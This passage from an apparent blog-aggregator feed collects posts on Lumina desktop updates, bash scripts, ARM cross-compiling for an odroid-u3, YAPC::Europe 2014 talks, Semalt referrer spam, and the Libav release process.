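path="/home/user/photos/summer holiday.jpg"

file="${path##*/}"      # strip longest  */ prefix  -> file name
dir="${path%/*}"        # strip shortest /* suffix  -> directory
ext="${file##*.}"       # extension
base="${file%.*}"       # file name without extension
safe="${file// /_}"     # replace every space with an underscore

echo "$file"            # summer holiday.jpg
echo "$dir"             # /home/user/photos
echo "$ext"             # jpg
echo "$base"            # summer holiday
echo "$safe"            # summer_holiday.jpg

# Splitting: break a colon-separated string into an array
IFS=':' read -ra parts <<< "a:b:c"
echo "${#parts[@]}"     # 3
```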

An interview with Ken Moore about the Lumina Desktop Environment.

File Info: 28Min, 14MB.

Ogg Link:

This is why I don’t need Google:

“I don’t need Google, my wife knows everything!” T-Shirt
I found this T-shirt in the old town of Rhodes, while descending Socrates road. I bought it, of course.

As we are getting ready for PC-BSD 10.0.3, I wanted to share a little preview of what to expect with the Lumina desktop environment as you move from version 0.4.0 to 0.6.2.

To give you a quick summary, pretty much everything has been updated/refined, with several new utilities written specifically for Lumina. The major new utility is the “Insight” file manager, with ZFS snapshot integration, multimedia player, and image slideshow viewer capabilities built right in by default. There is also a new screenshot utility, and the desktop configuration utility has been completely rewritten. I am going to list more details about all the updates between the versions below, but for those of you who are not interested in the details, you can just take a look at some screenshots instead.





(Moving from 0.4.0 to 0.6.2)

– A desktop plugin system has been implemented, with two plugins available at the moment (a calendar plugin and an application launcher plugin).
– The panel plugin system has been refined quite a bit, with transparency support for the panel itself and automatic plugin resizing for example.
– A new panel plugin has been added: the system dashboard. This plugin allows control over the audio volume, screen brightness, and current workspace, while also displaying the current battery status (if applicable) and containing a button to let the user log out (or shutdown/restart the system).
– The user button panel plugin has been re-implemented as well, incorporating the functionality of the desktopbar plugin. Now the user has quick access to files/applications in the ~/Desktop folder, as well as the ability to add/remove shortcuts to system applications in the desktop folder with one click.
– New background wallpapers and project logo (courtesy of iXsystems).

NOTE: Users of the older versions of the Lumina desktop will have their configuration files returned to the defaults after logging in to the new version for the first time.

The new file manager (lumina-fm, also called “Insight”):
– Browse the system and allow the bookmarking of favorite directories
– Simple multimedia player to allow playing/previewing multimedia files
– Image slideshow viewer for previewing image files
– Full ZFS file/directory restore functionality if ZFS snapshots are available
– Menu shortcuts to quickly browse attached/mounted devices
– Tabbing support for browsing multiple directories at once
– Standard file/directory management (copy/paste/delete/create)
– Supported multimedia and image formats are auto-detected on start, so if a particular file is not recognized, you just need to install the appropriate library or plugin on your system to provide support (none required by default).

The new screenshot utility (lumina-screenshot):
– Simple utility to create/save screenshots on the system.
– Can capture the entire screen, or individual windows.
– Can delay the image capture for a few seconds as necessary.
– Automatically assigned to the “Print Screen” keyboard shortcut by default, but also listed in the application registry under utilities.

The configuration utility (lumina-config):
– Completely new implementation
– Configure desktop appearance (background image, add desktop plugins)
– Configure panels (location, color/transparency, size, manage plugins, up to 2 panels supported per screen)
– Configure right-click menu plugins
– Manage/set global keyboard shortcuts (including shortcuts for adjusting audio volume or screen brightness)
– Manage/set default applications for the system by categories or individually
– Manage session options (enable numlock on log in, play audio chimes)
– Manage/set applications/files to be launched on log in
– Manage window system options (appearance, mouse focus policy, window placement policy, number of workspaces)

The application/file opener utility (lumina-open):
– Update the overall appearance of the application selector window.
– Fully support registered mime-types on the system now, and recommend those applications as appropriate.

Just found another plugin for my Serendipity blog.

It has been around for a long time, but unfortunately I didn't know about it.

So far I had done without syntax highlighting, because it often causes problems in a blog. With this one, however, it seems to work well.

As an example, here is a bash script:

#  Title:
#  Author: Bed [@]
#  Web:
#  Version 0.3
#  Requirements: ImageMagick, for the console tools convert
#  and mogrify
#  Purpose: scales images to 1280x1024; if the orientation hints
#           in the source image are intact, the image is rotated
#           correctly.
#           The scaled image is stamped with a text note; if the
#           mogrify call in the loop is disabled (by inserting a '#'),
#           the branding is skipped.
count=$(/bin/echo $NAUTILUS_SCRIPT_SELECTED_URIS | wc -w)
teil=$[100 / $count]
( for file in $NAUTILUS_SCRIPT_SELECTED_URIS; do
	file_name=$(echo $file | sed -e 's/file:\/\///g' -e 's/\%20/\ /g' -e 's/.*\///g')
	file_folder=$(echo $file | sed -e 's/file:\/\///g' -e 's/\%20/\ /g' -e "s/$file_name//g")
	convert -auto-orient -strip -geometry 1280x1024 -quality 80 "$file_folder/$file_name" "${file_folder}/${file_name}_resized_1280x1024.jpg"
	teiler=$[$teiler + $teil]
	echo $teiler
	mogrify -pointsize 10 -fill gray -gravity SouthWest -draw "text 10,20 'Copyright Bernd Dau'" "${file_folder}/${file_name}_resized_1280x1024.jpg"
	echo $teiler
	teiler=$[$teiler + $teil]
done ) | (zenity --progress --percentage=$teil --auto-close)
A small side effect: readers of my blog can only see the highlighting effect if they view the post in its original form on the blog. Not that my visitor numbers matter much to me, but comments are the salt in the blog soup. And you only get those from direct readers, not from feed subscribers. Apart from that, the blog boom is generally over anyway, isn't it?

Oh, and: to activate the highlighting, the <pre> tag is used:  <pre class="brush: bash">

Arm cross compiler setup and stuffs

This will set up a way to compile things for ARM on your native system (amd64 for me).

emerge dev-embedded/u-boot-tools sys-devel/crossdev
crossdev -S -s4 -t armv7a-hardfloat-linux-gnueabi

Building the kernel

This assumes you have kernel sources; I'm testing 3.17-rc2 since support for the odroid-u3 just went upstream.

Also, I tend to build without modules, so keep that in mind.

# get the base config (for me, on an odroid-u3)
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make exynos_defconfig
# change it to add what I want/need
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make menuconfig
# build the kernel
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j10

Setting up the SD Card

I tend to be generous, 10M for the bootloader

parted /dev/sdb mklabel msdos y
parted /dev/sdb mkpart p fat32 10M 200M
parted /dev/sdb mkpart p 200M 100%
parted /dev/sdb toggle 1 boot

mkfs.vfat /dev/sdb1
mkfs.ext4 /dev/sdb2

Building uboot

This may differ between boards, but should generally look like the following (I hear vanilla u-boot works now)

I used the odroid-v2010.12 branch; one thing to note is that if it sees a zImage on the boot partition it will ONLY use that, which is kind of annoying.

git clone git://
cd u-boot
sed -i -e "s/soft-float/float-abi=hard -mfpu=vfpv3/g" arch/arm/cpu/armv7/
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make smdk4412_config
ARCH=arm CROSS_COMPILE=armv7a-hardfloat-linux-gnueabi- make -j1
sudo sh /home/USER/dev/arm/u-boot/sd_fuse/ /dev/sdb

Copying the kernel/userland

sudo -i
mount /dev/sdb2 /mnt/gentoo
mount /dev/sdb1 /mnt/gentoo/boot
cp /home/USER/dev/linux/arch/arm/boot/dts/exynos4412-odroidu3.dtb /mnt/gentoo/boot/
cp /home/USER/dev/linux/arch/arm/boot/zImage /mnt/gentoo/boot/kernel-3.17-rc2.raw
cd /mnt/gentoo/boot
cat kernel-3.17-rc2.raw exynos4412-odroidu3.dtb > kernel-3.17-rc2

tar -xf /tmp/stage3-armv7a_hardfp-hardened-20140627.tar.bz2 -C /mnt/gentoo/

Setting up userland

I tend to just copy or generate a shadow file and overwrite the root entry in /etc/shadow...

The rest can be set up once booted.
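One way to pre-seed the root entry (a sketch; 'changeme' and the shadow field values are placeholders, and `openssl passwd -6` needs OpenSSL 1.1.1 or newer):

```shell
# Generate a SHA-512 crypt hash for the root password
# ('changeme' is a placeholder password -- pick your own).
hash=$(openssl passwd -6 'changeme')

# Print a shadow-style root entry; write this over the root line
# in /mnt/gentoo/etc/shadow on the card.
echo "root:${hash}:16000:0:99999:7:::"
```

The hash can of course also be copied from an existing /etc/shadow on another box, as mentioned above.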

Setting up the bootloader

put this in /mnt/gentoo/boot/boot.txt

setenv initrd_high "0xffffffff"
setenv fdt_high "0xffffffff"
setenv fb_x_res "1920"
setenv fb_y_res "1080"
setenv hdmi_phy_res "1080"
setenv bootcmd "fatload mmc 0:1 0x40008000 kernel-3.17-rc2; bootm 0x40008000"
setenv bootargs "console=tty1 console=ttySAC1,115200n8 fb_x_res=${fb_x_res} fb_y_res=${fb_y_res} hdmi_phy_res=${hdmi_phy_res} root=/dev/mmcblk0p2 rootwait ro mem=2047M"
and run this

mkimage -A arm -T script -C none -n "Boot.scr for odroid-u3" -d boot.txt boot.scr
That should do it :D

I used steev (a fellow gentoo dev) as a source.

YAPC::Europe 2014, day 2 The Party Line | 2014-08-23 14:23 UTC

Ignat Ignatov talked about physical formulas. When I was planning to attend this talk, I thought it was going to be some sort of symbolic formula computation, possibly with an analysis of the dimensions of the physical quantities.
However, despite my (a bit long in the tooth) background in physics, I did not understand a word of it. Apparently, some sort of unification of physical formulas, not entirely unlike the periodic table in chemistry, was presented, with almost no comprehensible details and with scary words like cohomology and algebraic topology. The fact that half of the slides were in Russian, while irrelevant for me personally, probably did not help matters for the majority of the people in the audience. I did not expect any questions at the end of the talk, but there were at least two, so I was probably wrong about the general level of understanding in the audience.

Laurent Dami talked about SQL::Abstract::FromQuery. He presented a query form of the Request Tracker and said that it is too complex - a premise many would agree with. The conclusion was that some more natural way to allow the user to specify complex queries is needed. Surprisingly, the answer to that was to use a formal grammar and make the user adhere to it. To me this sounds weird, but if one can find a non-empty set of users who would tolerate this, it may just work.

Denis Banovic talked about Docker, a virtualization container. I did not know much about Docker until this point, so it was useful to have someone to explain it to me.

The next talk was a long one, 50 minutes (as opposed to the 20 minutes that is somewhat standard for this conference): Peter "ribasushi" Rabbitson presented a crash course in SQL syntax and concepts. It looked like a beginner-level introduction to SQL, but it became better and better as it progressed. I even learned a thing or two myself. ribasushi has a way of explaining rather complicated things concisely, understandably, and memorably at the same time. Excellent talk.

Then there was a customary Subway sandwiches lunch.

Naim Shafiyev talked about network infrastructure automation. Since this is closely related to what I do at my day job, I paid considerable attention to what he had to say. I did not hear anything new, but hopefully the rest of the audience found the talk more useful. It did inspire me to submit a lightning talk, though.

osfameron talked about immutable data structures in Perl and how to clone them with modifications, while making sure that the code does not look too ugly. Pretty standard stuff for functional languages, but pretty unusual in the land of Perl. The presentation was lively, with a lot of funny pictures and Donald Duck examples.

The coffee break was followed by another session of lightning talks, preceded by a give-away of a number of free books for the first-time YAPC attendees. Among the talks I remembered were SQLite virtual table support in Perl by Laurent Dami, a web-based database table editor by Simun Kodzoman, LeoNerd's presentation about an XMPP replacement called Matrix, a Turing-complete (even if obfuscated) templating system by Jean-Baptiste Mazon of Sophia (sp!), and announcements of Nordic Perl Workshop 2014 (Helsinki, November) and Nordic Perl Workshop 2015 (Oslo, May).

Again, I did not go to the end-of-the-day keynote.

As a side note, the wireless seemed to be substantially more flaky than yesterday, which has affected at least some lightning talk presenters.

Aufgerüstet My Universe | 2014-08-23 13:17 UTC

After my machine was fitted with an Nvidia GeForce GTX 780 Ti at the beginning of the year to match the performance appetite of X-Plane 10, today the long-awaited upgrade of the peripherals finally took place.

The postman had to lug this huge box across the crater landscape in front of our front door. And that it was not just air inside was easy to tell from the weight…

Unpacked and set up, the new peripherals (Saitek Pro Flight rudder pedals plus a Thrustmaster HOTAS Warthog joystick with its matching throttle quadrant) give my home cockpit quite a different look. For a size comparison: the monitor, at 24″, is not exactly small either…

It only gets properly nerd-worthy, though, once the computer supplies power. The throttle quadrant is well equipped with a whole row of LEDs to cut a fine figure on night flights, too.

For now, though, it is time to install and test extensively. How the new peripherals hold up in flight is something I will report in a new posting when I get the chance.

Hier Spukt's My Universe | 2014-08-22 19:15 UTC

Almost four months ago I revived this website with Nikola; for me a good solution, above all because it was simple to implement. After four months it was time to take stock. As expected, Nikola is enormously capable when it comes to rendering postings: reStructuredText is hard to beat in terms of feature set and extensibility, and code examples in particular are rendered beautifully thanks to Pygments.

As comfortable as editing a single posting with Nikola is, the publishing workflow is just as cumbersome. Here I have to admit that I had the wrong idea of how slow and laborious publishing a new posting actually is; after all, the entire blog has to be re-rendered. The workflow looks like this: first a posting is written, then the site has to be re-rendered, and it can only be previewed correctly through a locally started web server.

Things look even worse when it comes to correcting a simple transposed letter or digit. Even for that, the whole machinery has to be started up; and apart from that, it is only ever possible on a machine that has the correct Nikola version installed and remote access for publishing to the server set up.

More or less by accident I stumbled across ghost, a still-young blog engine based on node.js that focuses strongly on content creation. My own tests with a local Ghost installation left me quite enthusiastic, and I started tinkering with a customized theme and, just for fun, porting a few postings from my existing blog to the Markdown format Ghost uses.

At some point the tinkering got serious, and I looked into deploying ghost as a production environment and integrating an Isso-based comment system. Building my own Isso setup in particular turned out to be quite a challenge; with uWSGI, however, a stable installation could eventually be put together.

Step by step this became the current production environment, which I now like so much that today I set the migration of my website in motion. Over the next few hours the DNS records should be updated everywhere, so from tomorrow this site should also be reachable under the www subdomain. Of course, far from all the content of the old blog has been converted yet; that will probably drag on for a few more weeks. But considering that the most recent not-yet-migrated postings date from March 2012, hardly anyone will seriously miss them.

As of today, more than 50% of the 37527 ebuilds in the Gentoo portage tree use the newest ebuild API (EAPI) version, EAPI=5!
The details of the various EAPIs can be found in the package manager specification (PMS); the most notable new feature of EAPI 5, which has sped up acceptance a lot, is the introduction of so-called subslots. A package A can specify a subslot; another package B that depends on it can specify that it needs to be rebuilt when the subslot of A changes. This leads to much more elegant solutions for many of the link or installation path problems that revdep-rebuild, emerge @preserved-rebuild, or e.g. perl-cleaner try to solve... Another useful new feature in EAPI=5 is the masking of USE flags specifically for stable-marked ebuilds.
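As a sketch of how subslots look in practice (the package names and version numbers below are made up for illustration), the library ebuild declares a subslot as part of SLOT, and a consumer uses the ':=' slot operator:

```bash
# dev-libs/libfoo-5.2.ebuild -- the library (hypothetical package)
EAPI=5
# slot 0, subslot 5: the subslot is bumped whenever the SONAME changes
SLOT="0/5"

# net-misc/bar-1.0.ebuild -- a consumer (hypothetical package)
EAPI=5
# ':=' records libfoo's subslot at build time; when libfoo moves to
# SLOT="0/6", the package manager schedules bar for a rebuild
RDEPEND="dev-libs/libfoo:="
```

This is how the package manager knows to rebuild consumers without an external tool like revdep-rebuild scanning for broken links.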
You can follow the adoption of EAPIs in the portage tree on an automatically updated graph page.

YAPC::Europe 2014, day 1 The Party Line | 2014-08-22 14:51 UTC

When I came to the venue 15 minutes before the official start of the registration, people at the registration desk were busily cutting sheets of paper into attendees' badges. Finding my badge turned out to be a tad nontrivial.

This conference is somewhat unusual not only because it is conducted over the weekend instead of in the middle of the week, but also because the keynotes for every day are pushed till the end, even after the daily lightning talks session.

The welcome talk from Marian was about practical things such as room locations, dinner, lunches, transportation and so on. Then I went on stage to announce the location of YAPC::Europe 2015 (which is Granada, Spain, by the way). After that Jose Luis Martinez did a short presentation of YAPC in Granada, and Diego Kuperman gave a little present from Granada to Sofia.

Mihai Pop presented a talk called "Perl Secret". It was basically a 20-minute version of BooK's lightning talk about Perl secret operators, somewhat diluted by interspersed references to minions. It was entertaining.

The great Mark Overmeer talked about translation with context. He went beyond the usual example of multiple variants of plural values in some languages, and talked about solving localization problems related to gender and so on. The module solving these problems is Log::Report::Translate::Context. As always, great attention to details from Mark.

After lunch (sandwiches from Subway), Alex Balhatchet of Nestoria presented hurdles of geocoding, with solutions. I and my co-workers had encountered similar problems on a far smaller scale, so I could understand the pains, and had a great interest in hearing about the solutions.

Then I attended a very inspiring talk by Max Maischein from Frankfurt about using Perl as a DLNA remote and as a DLNA media server. I immediately felt the urge to play with the code he published and try to adapt it to my own TV at home. There was even a live demo of using DLNA to stream to Max's laptop a live stream of the talk provided by the conference organizers. And it even worked, mostly.

Ervin Ruci talked more about geocoding — this talk partially touched the same problems Alex Balhatchet was talking about. Unfortunately, it was substantially less detailed, so I was somewhat underwhelmed by it. The presenter mentioned cool things like dealing with the fuzziness of the input data using hidden Markov models, but did not expand on them.

StrayTaoist described how to access raw data from space telescopes using (of course) Perl. A very lively talk. There was a lot of astronomy porn in there.

Luboš Kolouch from the Czech Republic talked about automotive logistics, and how open source solutions work where proprietary solutions do not. The software needs to be reliable enough to ensure that it takes only 1.5 hours between a part order and its physical delivery to the factory.

After the coffee break, with more mingling, the inimitable R Geoffrey Avery choir-mastered an hour of lightning talks. Most talks were somewhat "serious" today; I hope we see more "fun" ones in the coming days.

Unfortunately, I missed the first keynote of the conference from Curtis "Ovid" Poe, so cannot really say anything about it.

Finally, we went to Restaurant Lebed for the conference dinner. The location is superb, there is a great view over a lake. The food was great, too. We also got to enjoy some ethnic Bulgarian music and dancing, not too much, and not too little.

Lots of cheers to Marian and the team of volunteers for organizing what so far turns out to be a great conference.

X with glamor on vc4 anholt's lj | 2014-08-21 23:58 UTC

Today I finally got X up on my vc4 driver using glamor.  As you can see, there are a bunch of visual issues, and what you can't see is that after a few frames of those gears the hardware locked up and didn't come back.  It's still major progress.
The code can be found in my vc4 branch of mesa and linux-2.6, and the glamor branch of my xf86-video-modesetting.  I think the driver's at the point now that someone else could potentially participate.  I've intentionally left a bunch of easy problems -- things like supporting the SCS, DST, DPH, and XPD opcodes, for which we have piglit tests (in glean) and are just a matter of translating the math from TGSI's vec4 instruction set (documented in tgsi.rst) to the scalar QIR opcodes.

Yes, Telefónica gives me no IPv6, but then I at least want this "IPv4.5" that was shown yesterday on ARD's PlusMinus:

It all started with this commit from Jordan Hubbard on August 21, 1994:

Commit my new ports make macros
Still not 100% complete yet by any means but fairly usable at this stage.

Twenty years later the ports tree is still there and actively
maintained. A video was prepared to celebrate the event and to thank
all of you who give some of their spare time and energy to the project!

Was ist Kiva? | 2014-08-20 13:10 UTC

For everyone who does not know Kiva yet, there is a new promotional video that explains in a good minute and a half what Kiva is. Very nicely done:

Signing up is very easy, and the team Netzwerft is also happy about every new member.

I’m slowly but surely starting to switch to a new laptop. The old one hasn’t completely died (yet) but given that I had to force its CPU frequency at the lowest Hz or the CPU would burn (and the system suddenly shut down due to heat issues), and that the connection between the battery and laptop fails (so even new battery didn’t help out) so I couldn’t use it as a laptop… well, let’s say the new laptop is welcome ;-)

Building Gentoo isn’t an issue (having only a few hours per day to work on it is) and while I’m at it, I’m also experimenting with EFI (currently still without secure boot, but with EFI) and such. Considering that the Gentoo Handbook needs quite a few updates (and I’m thinking to do more than just small updates) knowing how EFI works is a Good Thing ™.

For those interested – the EFI stub kernel instructions in the article on the wiki, and also in Greg’s wonderful post on booting a self-signed Linux kernel (which I will do later) work pretty well. I didn’t try out the “Adding more kernels” section in it, as I need to be able to (sometimes) edit the boot options (which isn’t easy to accomplish with EFI stub-supporting kernels afaics). So I installed Gummiboot (and created a wiki article on it).
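For reference, a Gummiboot setup boils down to two small text files on the EFI system partition (the paths, kernel file name and root device below are assumptions for illustration, not taken from my actual setup):

```
# /boot/loader/loader.conf
default gentoo
timeout 3

# /boot/loader/entries/gentoo.conf
title   Gentoo Linux
linux   /vmlinuz-3.16.1
options root=/dev/sda2 ro
```

The timeout is what gives you a menu at boot where the kernel command line can be edited, which is exactly the part that is hard to get with a plain EFI stub kernel.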

Lots of things still planned, so little time. But at least building chromium is now a bit faster – instead of 5 hours and 16 minutes, I can now enjoy the newer versions after little less than 40 minutes.

My last inquiry with the business customer support was a while ago, so it was time to ask again. The answer this time was not much better:

Unfortunately, there is no exact schedule for the introduction of IPv6 yet. Telefónica Germany will introduce IPv6 support at a later point in time.

In my previous post on the matter, I called for a boycott of Semalt by blocking access to your servers from their crawler, after a very bad-looking exchange on Twitter with a supposed representative of theirs.
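For those who want to join in, the usual approach (a sketch; the exact referrer pattern you need to match may vary) is a mod_rewrite rule that returns 403 Forbidden for requests whose Referer header mentions semalt:

```apache
# Refuse any request arriving with a semalt referrer.
RewriteEngine On
RewriteCond %{HTTP_REFERER} semalt\.com [NC]
RewriteRule .* - [F]
```

The [NC] flag makes the match case-insensitive, and [F] sends the 403 without serving any content.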

After I posted that, I got threatened by the same representative with a libel suit, even though that post was about documenting their current practices rather than shaming them. This got enough attention from other people who have been following the Semalt situation that I could actually gather some more information on the matter.

In particular, there are two interesting blog posts by Joram van den Boezen about the company and its tactics. It turns out that what I thought was a very strange private cloud setup – coming as it was from Malaysia – was actually a botnet. Indeed, what appears from Joram's investigations is that the people behind Semalt use sidecar malware both to gather URLs to crawl and to crawl them. And this, according to their hosting provider, is allowed because they make it clear in their software's license.

This is consistent with what I have seen of Semalt on my server: rather than my blog – which fares pretty well on the web as a source of information – I found them requesting my website, which is almost dead. Looking at all the websites in all my servers, the only other affected is my friend's which is by far not really an important one. But if we start from accepting Joram's findings (and I have no reason not to), then I can see how that can happen.

My friend's website is visited mostly by the people in the area we grew up in, and general friends of his. I know how bad their computers can be, as I have been doing tech support on them for years, and paid my bills that way. Computers that were bought either without a Windows license or with Windows Vista, that got XP installed on them so badly that they couldn't get updates even when they were available. Windows 7 updates that were done without actually possessing a license, and so on so forth. I have, at some point, added a ModRewrite-based warning for a few known viruses that would alter the Internet Explorer User-Agent field.

Add to this that even those who shouldn't be strapped for cash would want to avoid paying for anything if they can, you can see why software such as SoundFrost and other similar "tools" to download YouTube videos into music files would be quite likely to be found in computers that end up browsing my friend's site.

What remains unclear from all this information is why they are doing it. As I said in my previous post, there is no reason to abuse the referrer field other than to spam the statistics of the websites. Since the company is selling SEO services, one assumes that they do so to attract more customers. After all, if you spend time checking your Analytics output, you probably are the target audience of SEO services.

But after that, there are still questions that have no answer. How can that company do any analytics when they don't really seem to have any infrastructure but rather use botnets for finding and accessing websites? Do they only make money with their subscriptions? And here is where things can get tricky, because I can only hypothesize and speculate, words that are dangerous to begin with.

What I can tell you is that out there, many people have no scruple, and I'm not referring to Semalt here. When I tried to raise awareness about them on Reddit (a site that I don't generally like, but that can be put to good use sometimes), I stopped by the subreddit to get an idea of what kind of people would be around there. It was not as I was expecting, not at all. Indeed what I found is that there are people out there seriously considering using black hat SEO services. Again, this is speculation, but my assumption is that these are consultants that basically want to show their clients that their services are worth it by inflating the access statistics to the websites.

So either these consultants just buy the services from companies like Semalt, or even the final site owners don't understand that a company promising "more accesses" does not really mean "more people actually looking at your website and considering your services". It's hard for people who don't understand the technology to discern between "accesses" and "eyeballs". It's not much different from the fake Twitter followers studied by Barracuda Labs a couple of years ago — I know I read a more thorough study of one of the websites selling this kind of service but I can't find it. That's why I usually keep that stuff on Readability.

So once again, give some antibiotics to the network, and help cure the web from people like Semalt and the people who would buy their services.

Well, I added one-way links to my Facebook and Twitter pages.

Please understand that I use these as one-way faucets to social networks. I automatically post everything from this site there, but there is no additional content or contact possibility feeding back. This includes tracking on my side of things. If you want to use social media to stay up to date, feel free to do so; just keep in mind that I will not react to contact requests from those sites.

Libav Release Process Luca Barbato | 2014-08-16 15:23 UTC

Since the release document is lacking, here are a few notes on how it works; it will be updated soon =).


Libav has a separate version for each library it provides. As usual, a major version bump signifies an ABI-incompatible change, while a minor version bump marks a specific feature introduction or removal.
It is done this way to let users leverage pkgconf checks to require features, instead of using a compile+link check.
The APIChange document details which version corresponds to which feature.
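A downstream build system can then gate a feature on the library's minor version instead of compiling a test program. A sketch (the version number 55.18.0 is made up for illustration; the APIChanges document lists the real feature-to-version mapping):

```shell
# Ask pkg-config whether the installed libavcodec is new enough
# for a feature introduced in some specific minor version.
if pkg-config --atleast-version=55.18.0 libavcodec; then
    echo "feature available"
else
    echo "feature missing (libavcodec too old or not installed)"
fi
```

The same check works from autoconf or any other configure machinery that shells out to pkg-config.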

The Libav global version number e.g. 9.16 provides mainly the following information:

  • If the major number is updated the Libraries have ABI differences.
    • If the major number is even, API-incompatible changes should be expected, and downstreams should follow the migration guide to update their code.
    • If the major number is odd, no API-incompatible changes happened, and a simple rebuild **must** be enough to use the new library.
  • If the minor number is updated, it means that enough bugfixes piled up during the month/two-week period and a new point release is available.

Major releases

All the major releases start with a major version bump of all the libraries. This automatically enables new ABI-incompatible code and disables old deprecated code. Later, or within the same patch, the preprocessor guards and the deprecated code get removed.


Once the major bump is committed, the first alpha is tagged. Alphas live within the master branch; the codebase can still accept feature updates (e.g. small new decoders or new demuxers), but the API and ABI cannot have incompatible changes till the next one or two major releases.


The first beta tag also marks the start of the new release branch.
From this point all the bugfixes that hit the master will be backported, no feature changes are accepted in the branch.


The release is not different from a beta; it is still a tag in the release branch. The level of confidence that nothing breaks is much higher, though.

Point releases

Point releases are bugfix-only releases and they aim to provide seamless security updates.

Since most bugs in Libav are security concerns, users should update as soon as the new release is out. We keep our continuous integration system monitoring all the release branches in addition to the master branch, to be confident that backported bugfixes do not cause unexpected issues.

Libav 11

The first beta for the release 11 should appear in the next two days, please help us by testing and reporting bugs.